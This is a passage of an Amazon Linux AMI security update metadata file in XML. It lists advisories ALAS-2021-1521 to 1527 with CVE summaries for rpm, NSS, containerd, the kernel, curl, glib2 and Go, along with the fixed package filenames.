arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.22-1.85.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.22" release="1.85.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.22-1.85.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.22" release="1.85.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.22-1.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1521</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1521: medium priority package update for rpm</title><issued date="2021-07-08 18:38:00" /><updated date="2021-07-12 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3421:
A flaw was found in the RPM package in the read functionality. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package or compromise an RPM repository, to cause RPM database corruption. The highest threat from this vulnerability is to data integrity.
1927747: CVE-2021-3421 rpm: unsigned signature header leads to string injection into an rpm database
CVE-2021-20271:
A flaw was found in RPM's signature check functionality when reading a package file. This flaw allows an attacker who can convince a victim to install a seemingly verifiable package, whose signature header was modified, to cause RPM database corruption and execute code. The highest threat from this vulnerability is to data integrity, confidentiality, and system availability.
1934125: CVE-2021-20271 rpm: Signature checks bypass via corrupted rpm package
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20271" title="" id="CVE-2021-20271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3421" title="" id="CVE-2021-3421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpm-apidocs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-apidocs-4.11.3-40.79.amzn1.noarch.rpm</filename></package><package name="rpm-debuginfo" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.11.3" release="40.79.amzn1" epoch="0" arch="noarch"><filename>Packages/rpm-cron-4.11.3-40.79.amzn1.noarch.rpm</filename></package><package name="rpm-python26" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python26-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-build-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-libs-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-python27" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python27-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-devel" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.3" release="40.79.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rpm-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm-sign" version="4.11.3" release="40.79.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-sign-4.11.3-40.79.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-python27" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python27-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-python26" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python26-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-build-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-libs-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-sign" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-sign-4.11.3-40.79.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.11.3" release="40.79.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.11.3-40.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1522</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1522: medium priority package update 
for nspr nss-softokn nss-util</title><issued date="2021-07-08 18:41:00" /><updated date="2021-07-12 21:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-6829:
A flaw was found in nss. Using the EM side-channel, it is possible to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication during the ECDSA signature generation, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1826187: CVE-2020-6829 nss: Side channel attack on ECDSA signature generation
CVE-2020-12403:
A flaw was found in the way CHACHA20-POLY1305 was implemented in NSS. When using multi-part Chacha20, it could cause out-of-bounds reads. This issue was fixed by explicitly disabling multi-part ChaCha20 (which was not functioning correctly) and strictly enforcing tag length. The highest threat from this vulnerability is to confidentiality and system availability.
1868931: CVE-2020-12403 nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read
CVE-2020-12402:
A flaw was found in NSS, where it is vulnerable to RSA key generation cache timing side-channel attacks. An attacker with sufficient access to mount cache timing attacks during the RSA key generation process could recover the private key. The highest threat from this flaw is to confidentiality.
1826231: CVE-2020-12402 nss: Side channel vulnerabilities during RSA key generation
CVE-2020-12401:
A flaw was found in nss. Using the EM side-channel, it is possible to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication during the ECDSA signature generation, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1851294: CVE-2020-12401 nss: ECDSA timing attack mitigation bypass
CVE-2020-12400:
A side-channel flaw was found in NSS, in the way P-384 and P-521 curves are used in the generation of ECDSA signatures, leaking partial information about the ECDSA nonce. Given a small number of ECDSA signatures, this information can be used to steal the private key. The highest threat from this vulnerability is to data confidentiality.
1853983: CVE-2020-12400 nss: P-384 and P-521 implementation uses a side-channel vulnerable modular inversion function
CVE-2019-17023:
A protocol downgrade flaw was found in Network Security Services (NSS). After a HelloRetryRequest has been sent, the client may negotiate a lower protocol than TLS 1.3, resulting in an invalid state transition in the TLS State Machine. If the client gets into this state, incoming Application Data records will be ignored.
1791225: CVE-2019-17023 nss: TLS 1.3 HelloRetryRequest downgrade request sets client into invalid state
CVE-2019-17006:
A vulnerability was discovered in nss where input text length was not checked when using certain cryptographic primitives. This could lead to a heap-buffer overflow resulting in a crash and data leak. The highest threat is to confidentiality and integrity of data as well as system availability.
1775916: CVE-2019-17006 nss: Check length of inputs for cryptographic primitives
CVE-2019-11756:
A use-after-free flaw was found in Mozilla Network Security Services (NSS) related to PK11 session handling. An attacker could use this flaw to execute arbitrary code with the permissions of the user running the application compiled with NSS.
1774835: CVE-2019-11756 nss: Use-after-free in sftk_FreeSession due to improper refcounting
CVE-2019-11727:
A vulnerability exists where it is possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by the server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.
1730988: CVE-2019-11727 nss: PKCS#1 v1.5 signatures can be used for TLS 1.3
CVE-2019-11719:
When importing a curve25519 private key in PKCS#8 format with leading 0x00 bytes, it is possible to trigger an out-of-bounds read in the Network Security Services (NSS) library. This could lead to information disclosure. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.
1728436: CVE-2019-11719 nss: Out-of-bounds read when importing curve25519 private key
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11719" title="" id="CVE-2019-11719" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727" title="" id="CVE-2019-11727" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11756" title="" id="CVE-2019-11756" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17006" title="" id="CVE-2019-17006" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17023" title="" id="CVE-2019-17023" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12400" title="" id="CVE-2020-12400" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12401" title="" id="CVE-2020-12401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12402" title="" id="CVE-2020-12402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12403" title="" id="CVE-2020-12403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6829" title="" id="CVE-2020-6829" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.25.0" release="2.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.25.0-2.45.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.25.0-2.45.amzn1.i686.rpm</filename></package><package 
name="nspr-debuginfo" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.25.0-2.45.amzn1.i686.rpm</filename></package><package name="nspr" version="4.25.0" release="2.45.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.25.0-2.45.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.53.1" release="1.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.53.1-1.58.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.53.1" release="1.58.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.53.1-1.58.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.46.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.46.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.46.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.46.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1523</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1523: medium priority package update for containerd</title><issued date="2021-07-19 17:29:00" /><updated date="2021-12-29 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-32760:
A flaw was found in containerd where pulling and extracting a specially-crafted container image can result in Unix file permission changes for existing files in the host's filesystem. Changes to file permissions can deny access to the expected owner of the file, widen access to others, or set extended bits like setuid, setgid, and sticky. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process.
CVE-2021-21334:
A flaw was found in containerd CRI plugin. Containers launched through containerd CRI implementation that share the same image may receive incorrect environment variables, including values that are defined for other containers. The highest threat from this vulnerability is to data confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21334" title="" id="CVE-2021-21334" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32760" title="" id="CVE-2021-32760" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd-stress" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.6-2.7.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.6-2.7.amzn1.x86_64.rpm</filename></package><package name="containerd" version="1.4.6" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.6-2.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1524</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1524: important priority package update for kernel</title><issued date="2021-07-20 22:24:00" /><updated date="2021-07-21 18:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33909:
An out-of-bounds write flaw was found in the Linux kernel's seq_file in the Filesystem layer. This flaw allows a local attacker with a user privilege to gain access to out-of-bound memory, leading to a system crash or a leak of internal kernel information. The issue results from not validating the size_t-to-int conversion prior to performing operations. The highest threat from this vulnerability is to data integrity, confidentiality and system availability.
1970273: CVE-2021-33909 kernel: size_t-to-int conversion vulnerability in the filesystem layer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33909" title="" id="CVE-2021-33909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.422.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.422.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.422.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.422.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.422.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1525</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1525: medium priority package update for curl</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 18:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-22924:
A flaw was found in libcurl in the way libcurl handles previously used connections without accounting for 'issuer cert' and comparing the involved paths case-insensitively. This flaw allows libcurl to use the wrong connection. The highest threat from this vulnerability is to confidentiality.
1981460: CVE-2021-22924 curl: Bad connection reuse due to flawed path name checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22924" title="" id="CVE-2021-22924" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.99.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.99.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.99.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1526</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1526: important priority package update for glib2</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 18:45:00" /><severity>important</severity><description>Package updates are available for 
Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27219:
An issue was discovered in GNOME GLib before 2.66.6 and 2.67.x before 2.67.3. The function g_bytes_new has an integer overflow on 64-bit platforms due to an implicit cast from 64 bits to 32 bits. The overflow could potentially lead to memory corruption.
1929858: CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27219" title="" id="CVE-2021-27219" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.22.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.22.amzn1.noarch.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.22.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.22.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.22.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1527</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1527: medium priority package update for 
golang</title><issued date="2021-09-02 22:54:00" /><updated date="2021-09-08 19:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-34558:
A flaw was found in golang. A panic can be triggered by an attacker in a privileged network position without access to the server certificate's private key, as long as a trusted ECDSA or Ed25519 certificate for the server exists (or can be issued), or the client is configured with Config.InsecureSkipVerify. Clients that disable all TLS_RSA cipher suites (that is, TLS 1.0-1.2 cipher suites without ECDHE), as well as TLS 1.3-only clients, are unaffected.
1983596: CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
CVE-2021-33198:
A flaw was found in Go, where it attempts to allocate excessive memory. This issue may cause panic or unrecoverable fatal error if passed inputs with very large exponents. The highest threat from this vulnerability is to system availability.
1989575: CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents
CVE-2021-33197:
A flaw was found in Go's ReverseProxy (net/http/httputil), which forwards Connection headers if the first one is empty. This flaw allows an attacker to drop arbitrary headers. The highest threat from this vulnerability is to integrity.
1989570: CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33197" title="" id="CVE-2021-33197" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33198" title="" id="CVE-2021-33198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34558" title="" id="CVE-2021-34558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.14" release="1.69.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.14-1.69.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.15.14" release="1.69.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.14-1.69.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.15.14" release="1.69.amzn1" epoch="0" 